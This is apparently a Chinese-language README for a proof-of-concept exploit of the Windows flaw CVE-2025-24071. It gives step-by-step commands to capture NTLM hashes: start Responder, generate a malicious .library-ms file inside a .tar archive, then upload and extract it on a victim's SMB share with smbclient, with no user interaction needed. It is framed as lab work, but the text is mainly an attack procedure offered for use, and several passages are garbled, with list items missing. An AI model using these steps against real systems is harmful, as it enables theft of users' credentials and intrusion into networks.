这是利用 CVE-2025-24071 的概念验证代码,该漏洞存在于 Windows 中,允许通过 .library-ms 文件泄露 NTLM 哈希。此版本与其他版本略有不同,它使用 .tar 存档而不是 .zip,这提高了在纯 SMB 环境中的兼容性。
.tar 而不是 .zip?大多数公开的概念验证使用 .zip 来打包恶意的 .library-ms 文件。但是,如果你在受限的 SMB 环境中工作(例如,只能通过 smbclient 访问),则无法远程解压 ZIP 文件。通过使用 .tar 存档,你可以使用 smbclient 内置的 tar 命令直接从 SMB 共享中提取载荷,从而在 无需用户交互 的情况下进行远程部署。
ResponderResponder、impacket-smbserver 或 samba)在正确的接口上启动 Responder:
sudo responder -I <interface>
确保载荷中的 IP 与此接口匹配。
python3 create_tar_poc.py
系统会提示你输入:
这将生成:
从你的攻击机使用 smbclient 连接到受害者的 SMB 共享:
smbclient //<victim_ip>/<sharename> -U <USERNAME>
put exploit.tar
tar x exploit.tar
这会将 .library-ms 解压到共享中。
当 exploit.tar 被解压时,包含恶意 xml 的 .library-ms 文件将连接到我们的 SMB(即我们机器上正在运行的 Responder),从而发起一次使用 NTLM 的身份验证尝试,发送包含用户名、域和用户密码的 NTLM 哈希的请求,我们随后可以对其进行解密。
即将推出...
Daniel Miranda Barcelona 又名 Excal1bur | 基于 0x6rss 的原始工作,针对实验室场景中的基于 TAR 的 SMB 部署进行了改编。